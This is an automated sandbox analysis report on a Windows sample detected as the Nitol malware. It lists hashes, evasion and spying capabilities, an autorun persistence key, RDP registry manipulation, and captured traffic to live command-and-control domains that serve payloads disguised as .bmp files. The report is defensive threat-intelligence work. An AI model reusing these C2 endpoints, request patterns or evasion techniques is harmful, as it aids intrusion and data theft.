Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rudvfa0Z17.exe

Overview

General Information

Sample name:Rudvfa0Z17.exe
renamed because original name is a hash value
Original sample name:44d3fbf225fc3e6ae2bf8b68f3dd69fc180d29e2b69ff8f53c83ce78c07845ce.exe
Analysis ID:1499612
MD5:bed10af8b143ee5b48c221be89786600
SHA1:69ab3c83dd7f2f54d7d08c46a7c900b00981c968
SHA256:44d3fbf225fc3e6ae2bf8b68f3dd69fc180d29e2b69ff8f53c83ce78c07845ce
Tags:ad87h92j-comexe
Infos:

Detection

Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contains functionalty to change the wallpaper
Drops password protected ZIP file
Found API chain indicative of debugger detection
Hides threads from debuggers
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to access browser extension known for cryptocurrency wallets
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
AV process strings found (often used to terminate AV products)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Rudvfa0Z17.exe (PID: 6148 cmdline: "C:\Users\user\Desktop\Rudvfa0Z17.exe" MD5: BED10AF8B143EE5B48C221BE89786600)
    • 33MwVPy.exe (PID: 3116 cmdline: "C:\Program Files (x86)\90m3FHO\33MwVPy.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • OpenWith.exe (PID: 4720 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • 33MwVPy.exe (PID: 6848 cmdline: "C:\Program Files (x86)\90m3FHO\33MwVPy.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • 33MwVPy.exe (PID: 6672 cmdline: "C:\Program Files (x86)\90m3FHO\33MwVPy.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3883625638.0000000010064000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
    00000006.00000002.3883097194.0000000003258000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
      00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
        Process Memory Space: 33MwVPy.exe PID: 3116JoeSecurity_NitolYara detected NitolJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.33MwVPy.exe.3258c24.1.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
            6.2.33MwVPy.exe.3258c24.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDPDetects executables embedding registry key / value combination manipulating RDP / Terminal ServicesditekSHen
            • 0x777f8:$r1: SOFTWARE\Policies\Microsoft\Windows\Installer
            • 0x777e4:$k1: EnableAdminTSRemote
            • 0x77574:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x776d0:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x77708:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x77750:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x778c8:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x778a0:$k2: TSEnabled
            • 0x77844:$r3: SYSTEM\CurrentControlSet\Services\TermDD
            • 0x77870:$r4: SYSTEM\CurrentControlSet\Services\TermService
            • 0x77511:$k3: Start
            • 0x7751d:$k3: Start
            • 0x7752b:$k3: Start
            • 0x77547:$k3: Start
            • 0x7783c:$k3: Start
            • 0x77a6f:$k3: start
            • 0x77574:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x776d0:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x77708:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x77750:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
            • 0x778c8:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
            6.2.33MwVPy.exe.32f2c24.2.unpackJoeSecurity_NitolYara detected NitolJoe Security
              6.2.33MwVPy.exe.32f2c24.2.unpackINDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDPDetects executables embedding registry key / value combination manipulating RDP / Terminal ServicesditekSHen
              • 0x75ff8:$r1: SOFTWARE\Policies\Microsoft\Windows\Installer
              • 0x75fe4:$k1: EnableAdminTSRemote
              • 0x75d74:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75ed0:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75f08:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75f50:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x760c8:$r2: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x760a0:$k2: TSEnabled
              • 0x76044:$r3: SYSTEM\CurrentControlSet\Services\TermDD
              • 0x76070:$r4: SYSTEM\CurrentControlSet\Services\TermService
              • 0x75d11:$k3: Start
              • 0x75d1d:$k3: Start
              • 0x75d2b:$k3: Start
              • 0x75d47:$k3: Start
              • 0x7603c:$k3: Start
              • 0x7626f:$k3: start
              • 0x75d74:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75ed0:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75f08:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x75f50:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
              • 0x760c8:$r5: SYSTEM\CurrentControlSet\Control\Terminal Server
              6.2.33MwVPy.exe.3258c24.1.unpackJoeSecurity_NitolYara detected NitolJoe Security
                Click to see the 3 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\90m3FHO\33MwVPy.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Rudvfa0Z17.exe, ProcessId: 6148, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWS

                Suricata Signatures

                Timestamp:2024-08-27T09:48:51.304790+0200
                SID:2803304
                Severity:3
                Source Port:61382
                Destination Port:80
                Protocol:TCP
                Classtype:Unknown Traffic

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for dropped file
                Source: C:\Program Files (x86)\90m3FHO\t4d.tmpAvira: detection malicious, Label: DR/FakePic.Gen
                Source: C:\Program Files (x86)\90m3FHO\t5d.tmpAvira: detection malicious, Label: DR/FakePic.Gen
                Multi AV Scanner detection for submitted file
                Source: Rudvfa0Z17.exeReversingLabs: Detection: 28%
                Source: Rudvfa0Z17.exeVirustotal: Detection: 46%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Rudvfa0Z17.exe, 00000000.00000000.2024233746.0000000000684000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_5e6b499c-1
                Source: Rudvfa0Z17.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.17.45:443 -> 192.168.2.5:61384 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61385 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61386 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61387 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61388 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61389 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61390 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61391 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61392 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61393 version: TLS 1.2
                Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
                Source: Binary string: \NewJumpLogin\ReleaseSW300exe\JumpLogin.pdb source: Rudvfa0Z17.exe
                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.0.dr
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331E374 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,_strstr,_strstr,CreateFileA,CreatePipe,CreateProcessA,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,CreatePipe,CreateProcessA,ReadFile,ReadFile,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,FindNextFileA,std::ios_base::_Ios_base_dtor,6_2_0331E374
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331A3C4 FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,CreateFileA,GetFileSize,CreateFileA,GetFileSize,SetFilePointer,ReadFile,LocalAlloc,LocalFree,CloseHandle,Sleep,6_2_0331A3C4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03315134 lstrcpy,FindFirstFileA,lstrcpy,_strstr,LocalAlloc,LocalReAlloc,LocalSize,Sleep,LocalFree,FindNextFileA,FindClose,6_2_03315134
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331E194 lstrcpy,CreateDirectoryA,FindFirstFileA,lstrcpy,lstrcpy,CreateDirectoryA,CopyFileA,FindNextFileA,6_2_0331E194
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033150BD lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,6_2_033150BD
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033150DA lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,6_2_033150DA
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03316754 FindFirstFileA,FindClose,CreateFileA,Sleep,CreateFileA,CloseHandle,GetLastError,wsprintfA,6_2_03316754
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033164F4 lstrlen,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,6_2_033164F4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033254C4 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,6_2_033254C4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03347AFC FindFirstFileExW,6_2_03347AFC
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03315AD4 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,6_2_03315AD4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03315E14 FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,6_2_03315E14
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03314EB3 FindFirstFileA,FindClose,FindClose,6_2_03314EB3
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03315CE4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,RemoveDirectoryA,6_2_03315CE4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100230CD lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,6_2_100230CD
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10023110 lstrcpy,FindFirstFileA,lstrcpy,_strstr,LocalAlloc,LocalReAlloc,LocalSize,Sleep,LocalFree,FindNextFileA,FindClose,6_2_10023110
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1002C170 lstrcpy,CreateDirectoryA,FindFirstFileA,lstrcpy,lstrcpy,CreateDirectoryA,CopyFileA,FindNextFileA,6_2_1002C170
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1002C350 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,_strstr,_strstr,CreateFileA,CreatePipe,CreateProcessA,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,CreatePipe,CreateProcessA,ReadFile,ReadFile,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,FindNextFileA,std::ios_base::_Ios_base_dtor,6_2_1002C350
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100283A0 FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,CreateFileA,GetFileSize,CreateFileA,GetFileSize,SetFilePointer,ReadFile,LocalAlloc,LocalFree,CloseHandle,Sleep,6_2_100283A0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100334A0 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,6_2_100334A0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100244D0 lstrlen,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,6_2_100244D0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10024730 FindFirstFileA,FindClose,CreateFileA,Sleep,CreateFileA,CloseHandle,GetLastError,wsprintfA,6_2_10024730
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10023AB0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,6_2_10023AB0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10055AD8 FindFirstFileExW,6_2_10055AD8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10023CC0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,RemoveDirectoryA,6_2_10023CC0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10023DF0 FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,6_2_10023DF0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03319404 GetLogicalDriveStringsA,QueryDosDeviceA,lstrlen,lstrcpy,lstrcpy,lstrcat,6_2_03319404
                Source: global trafficHTTP traffic detected: GET /4/long.bmp HTTP/1.1Host: web.ad87h92j.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /4/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: global trafficHTTP traffic detected: GET /4/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: global trafficHTTP traffic detected: GET /4/t.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:61382 -> 188.114.97.3:80
                Source: global trafficHTTP traffic detected: POST /api.php/common/getdomain HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36Content-Length: 18Host: cacer.goldenh0ur.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/receivejson HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36Content-Length: 466Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: 95sqvgijt7l4529qr975935himContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: 95sqvgijt7l4529qr975935himContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: 95sqvgijt7l4529qr975935himContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: 95sqvgijt7l4529qr975935himContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: 95sqvgijt7l4529qr975935himContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: 95sqvgijt7l4529qr975935himContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: 95sqvgijt7l4529qr975935himContent-Length: 38Host: mvc.withoutyou5.com
                Source: global trafficHTTP traffic detected: POST /api.php/common/gettask HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36MAC: 95sqvgijt7l4529qr975935himContent-Length: 38Host: mvc.withoutyou5.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_00419560 ShellExecuteA,CreateThread,VirtualAlloc,VirtualAlloc,InternetOpenA,InternetOpenUrlA,InternetReadFile,CreateThread,0_2_00419560
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 27 Aug 2024 07:48:52 GMTContent-Type: image/bmpContent-Length: 6443425Connection: keep-aliveLast-Modified: Thu, 08 Aug 2024 15:32:21 GMTETag: "607df428a8e9da1:0"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 388Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gmftxSaKwtS4UJ5kgx4HMQwvWpl56Eh%2F9UIMomMLsLV5qNUoAw8KyHWwzcGcSWW7rV4TGJZtbMRG0AZWfWpvuOL2szeqmKRIFCwE%2B9tK%2BHEIYKgHq5AReo5Z4S9s655RXVp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b9a76334edf4394-EWRalt-svc: h3=":443"; ma=86400Data Raw: 50 4b 03 04 14 00 00 00 00 00 52 09 02 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 f1 31 ac 66 f1 31 ac 66 f1 31 ac 66 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 6a c1 ab 66 32 4d 82 66 87 7a eb 30 49 5c 70 71 cf 9f 0b 7f 37 1a ef fe ec 4e 99 14 e9 79 0c eb 41 b9 e8 f1 0c 4c 80 3a 7f 76 93 46 46 e8 65 7d bc 46 e7 22 b0 cc d0 5f 0c fe e5 9a c6 07 68 49 cf 67 8c de f1 91 0a 4d 5f 96 fa d9 d6 82 da 5d 83 1e 78 91 03 68 d0 5c f3 7f be 92 78 68 7f 9b 82 3d 58 0a 03 a3 ca 52 a9 20 ad ce 0c 1c 17 57 32 4f 23 2d bd 75 0e cf 2d 73 5a f1 a5 25 a2 53 54 c7 df 3d 96 7b f5 d6 b7 e4 a5 b1 33 57 3e 91 c8 b1 9f 68 0b 2f d7 28 a9 80 e2 6e 4c cc 82 c2 26 fe 2b 7e ce 5e 42 59 1b b0 3c 97 03 3a bf 54 e9 ce 6b d0 11 f6 8c a1 96 6a 71 dd 5b a0 e2 f0 6e 1c 54 d9 8d e7 7b 68 d7 cb 0f 8d a0 bc 2f 63 1e dc b5 69 41 6a 0d fd 2b c8 88 9c 7c 92 ea 7c bc 78 5c b1 3a 4c 96 53 a8 93 1a 43 8a 40 72 c9 cd 4d f3 75 0b d3 e0 d6 60 25 ae d3 66 4a 4b 5d b6 5e 17 3b 24 29 1b a7 07 28 1d 48 ce 8a 24 dd e5 0f 57 31 3b 63 bc e1 b9 39 3b 66 4c 46 9f 14 f3 c4 02 68 95 c3 21 3d 7c d0 7a 12 01 3c 08 32 de 1b 41 20 0a ef 8d 8e 3c cb 3d 54 8e 28 0e 74 2d a5 bb e4 c7 6a f7 4b 3c 19 7a 3e b3 55 75 93 98 a4 85 fc 3e 61 cb 06 22 80 2d 2c 37 b8 2a 5c b0 51 a6 6b 96 fb ee 27 23 f4 d0 04 a5 0c 50 95 84 0f 9b 47 8f 5b 48 3b 2a bb f4 f8 7d 94 68 ed 84 fa fd 02 9b 9e ae f0 7d 19 69 b4 c0 78 83 f0 ef 95 a1 21 73 56 4e d7 8b 38 9a ed e1 e8 8f 47 a6 26 5f 23 ea 1f c9 5d 4a c2 09 00 e3 5f 67 5d 15 a9 47 b3 f4 9d Data Ascii: PKRYtext/UT1f1f1fPK7Xxtext/MSVCP140.dllUTejf2Mfz0I\pq7NyAL:vFFe}F"_hIgM_]xh\xh=XR W2O#-u-sZ%ST={3W>h/(nL&+~^BY<:Tkjq[nT{h/ciAj+||x\:LSC@rMu`%fJK]^;$)(H$W1;c9;fLFh!=|z<2A <=T(t-jK<z>Uu>a"-,7*\Qk'#PG[H;*}h}ix!sVN8G&_#]J_g]G
                Source: global trafficHTTP traffic detected: GET /4/long.bmp HTTP/1.1Host: web.ad87h92j.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /4/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: global trafficHTTP traffic detected: GET /4/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: global trafficHTTP traffic detected: GET /4/t.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: web.ad87h92j.com
                Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: web.ad87h92j.com
                Source: global trafficDNS traffic detected: DNS query: cacer.goldenh0ur.com
                Source: global trafficDNS traffic detected: DNS query: mvc.withoutyou5.com
                Source: unknownHTTP traffic detected: POST /api.php/common/getdomain HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36Content-Length: 18Host: cacer.goldenh0ur.com
                Source: Rudvfa0Z17.exeString found in binary or memory: http://api.jumpw.com/Announcement.html?gameid=
                Source: Rudvfa0Z17.exeString found in binary or memory: http://api.jumpw.com/Announcement.html?gameid=&channel=Receive
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
